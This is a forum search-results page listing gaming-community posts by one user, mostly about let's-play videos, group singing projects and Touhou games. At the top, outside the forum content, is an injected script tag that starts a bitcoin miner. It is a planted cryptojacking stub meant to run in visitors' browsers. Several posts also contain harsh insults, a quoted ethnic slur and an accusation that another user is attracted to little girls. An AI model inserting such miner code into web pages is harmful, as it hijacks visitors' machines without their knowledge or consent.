<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectmario fan games galaxy

Search found 1205 matches

Go to advanced search

by Time Traveler
7 years ago
Forum: art showcase
Topic: Very nearly able to be called 'art': Videos!
Replies: 50
Views: 4708

Re: Very nearly able to be called 'art': Videos!

limepie20 wrote:Huh. Well, congratulations on the attainment?
Thanks. It was pretty hard to resist typing anything aside from "this is horrible" for 50 lines.
by Time Traveler
7 years ago
Forum: art showcase
Topic: Very nearly able to be called 'art': Videos!
Replies: 50
Views: 4708

Re: Very nearly able to be called 'art': Videos!

"This is horrible!" Constructive criticism, TT style This is basically slander. I explained in 6 points exactly what was wrong with the video - 6 things to stop doing to make videos that would at least not incite rage in people. Why are you defending him to the point where you stop even trying to r...
by Time Traveler
7 years ago
Forum: art showcase
Topic: Very nearly able to be called 'art': Videos!
Replies: 50
Views: 4708

Re: Very nearly able to be called 'art': Videos!

I mean, it's impossible to convey just how horrible your inane screeching is in words. If I had to describe it to another person, I would have to reference a Lovecraftian dictionary at multiple points. The sheer effort which you exerted in sounding like AGONY is commendable. AUS, if you can't see j...
by Time Traveler
7 years ago
Forum: art showcase
Topic: Very nearly able to be called 'art': Videos!
Replies: 50
Views: 4708

Re: Very nearly able to be called 'art': Videos!

AUS wrote:Oh noes, I have been thoroughly trolled, welp, that's life I guess. :lol:
If you view legitimate and helpful criticism as "trolling", I guess it makes sense that you make videos like "NO~~~!"
by Time Traveler
7 years ago
Forum: art showcase
Topic: Very nearly able to be called 'art': Videos!
Replies: 50
Views: 4708

Re: Very nearly able to be called 'art': Videos!

Someone linked that in IRC and I speak from the heart when I say that that is one of the worst videos I have ever seen in my life. Congratulations on being more entertaining than that one video of a man being decapitated, at least. Like, it's nigh-impossible offer any kind of constructive criticism ...
by Time Traveler
7 years ago
Forum: the gazebo
Topic: [TALKHAUS SINGS] - LAST THREE PROJECTS REUPLOADED JULY 2!
Replies: 1087
Views: 97120

Re: TALKHAUS Sings 9 - Under New Management

Matryoshka usually makes for pretty good choruses, and it's not 500 hours long

I would be OK with Matryoshka but I still better be up 100% of the time
by Time Traveler
7 years ago
Forum: the gazebo
Topic: [TALKHAUS SINGS] - LAST THREE PROJECTS REUPLOADED JULY 2!
Replies: 1087
Views: 97120

Re: TALKHAUS Sings 9 - Under New Management

OK what are we looking at? Snake Eater and Ryuuseigun? While I would love to do Ryuuseigun I am not sure that it would be such a good idea based on the last Japanese song we did. A lot of people aren't comfortable singing in other languages and, as we have seen, it is often uncomfortable to listen ...
by Time Traveler
7 years ago
Forum: the gazebo
Topic: [TALKHAUS SINGS] - LAST THREE PROJECTS REUPLOADED JULY 2!
Replies: 1087
Views: 97120

Re: TALKHAUS Sings 8 - Done!

When we sing Ryuuseigun I better be up through the entire thing

100% of lines
by Time Traveler
7 years ago
Forum: the gazebo
Topic: [TALKHAUS SINGS] - LAST THREE PROJECTS REUPLOADED JULY 2!
Replies: 1087
Views: 97120

Re: TALKHAUS Sings 8 - Done!

Image

P.S. I'm back, guys - everyone can stop worrying (>)
by Time Traveler
9 years ago
Forum: the gazebo
Topic: Talkhaus Badge
Replies: 12
Views: 1411

Re: Talkhaus Trophy

chdata wrote:TT?
Chdata?
by Time Traveler
9 years ago
Forum: let's play
Topic: rubberfishy Let's Plays Megaman 1 for the first time!
Replies: 87
Views: 7641

Re: rubberfishy Let's Plays Megaman 1 for the first time!

Don Zanevsky wrote:I liked rubberfishy's lps before he was popular
me too I forgot to subscribe though SORRY RUBBERFISHY I HOPE YOU FORGIVE ME :(
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

IDK Ryu Bateson wrote:Other way round. If Chelsea starts to *lose* clothing instead of *gaining* more of it, *then* we can start talking. ;p
Thank you for finally just coming out and admitting that the only reason you like Bunny is because you are attracted to little girls in skimpy clothing.
by Time Traveler
9 years ago
Forum: let's play
Topic: Let's Play NEW Super Marisa Land
Replies: 165
Views: 20419

Re: Let's Play NEW Super Marisa Land

World 5 is the only world which yukkuris show up in, so there is that at least.
by Time Traveler
9 years ago
Forum: touhou
Topic: Touhou 12.8 - The Great Fairy Wars
Replies: 34
Views: 6426

Re: Touhou 12.8 - The Great Fairy Wars

1cc on easy seems like an accomplishment worthy of bragging about (something I haven't even been able to do yet). For me, it seems that either Easy mode is way too easy or Normal mode is way too hard. I can consistently 1cc Easy with half a dozen lives left, but I can't beat Normal for the life of ...
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Is anyone else having trouble watching the same game for a second time? I mean, I can tolerate a game like this, yes, and I admit it was pretty cool, but twice? :| I have, like, nothing to say about this run because I said all I could the first time around. (Well, I can say that ladder = god, but y...
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Starbound2 wrote: And on that note, when exactly was she racist? Failure to understand the German-speaking vampire? And if I recall correctly, the only time she swore was during the final cutscene, so she isn't exactly "sailor-mouthed" as you say.
"YOU FUCKING KRAUT"
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Starbound2 wrote:I... don't quite get all the Bunny hate. I mean, yeah, I can understand hating the game, but...
Because she has no personality or character and is a sailor-mouthed racist?
by Time Traveler
9 years ago
Forum: let's play
Topic: Let's Play NEW Super Marisa Land
Replies: 165
Views: 20419

Re: Let's Play NEW Super Marisa Land

4-4 ARGH! 4-4 is a pretty crazy stage, but there IS a secret exit in 4-3 which allows you to skip in entirely, in addition to the one in 4-1 which allows you to skip the entirety of world 4. It's also way easier if you pretend the red stars don't exist. I honestly got more annoyed at stage 4-5, sim...
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

To be fair the reason why it didn't make sense was because he was using the dynamite body. Under the assumption that dynamite body didn't change how boss fights worked, the sword part seems impossible. Why would you assume as such? There have already been boss fights where parts of the floor were m...
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Kristian wrote:I heard everyone talking about 'sword phase' and now I see why. :|
Is it because raocow is incapable of figuring out the simplest of boss fights?
by Time Traveler
9 years ago
Forum: let's play
Topic: Let's Play NEW Super Marisa Land
Replies: 165
Views: 20419

Re: Let's Play NEW Super Marisa Land

Wow thanks for discovering secret exit in that waterway. That skips like half the game. Makes me wonder, what would happen if you beat the game from that route (skipping some bosses)? Because, minor detail? Open at your own risk That means you haven't found all the mushrooms... I just tried it out ...
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Kristian wrote:Though that was indeed a dick move at the end there. :|
For all the terrible design decisions in this game, that purple orb was not one of them. It's just raocow being... well, raocow.
by Time Traveler
9 years ago
Forum: archive
Topic: LET'S FEUD: SMWC VS. TALKHAUS
Replies: 155
Views: 15930

Re: LET'S FEUD: SMWC VS. TALKHAUS

1
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

If you do a Mario 64-esque double jump while in Dynamite Suit mode, you can jump to normal height.
by Time Traveler
9 years ago
Forum: let's play
Topic: Bunny Must Die, yo
Replies: 981
Views: 97347

Re: Bunny Must Die, yo

Well, since you didn't show it off: The second pumpkin boss's room is full of those time blocks. If you try and stop time while fighting him, the game will tell you "Whoops! You're in a wall." And then kill you. Also, I'm just going to tell you this now since it's honestly complete bullshit on the g...

Go to advanced search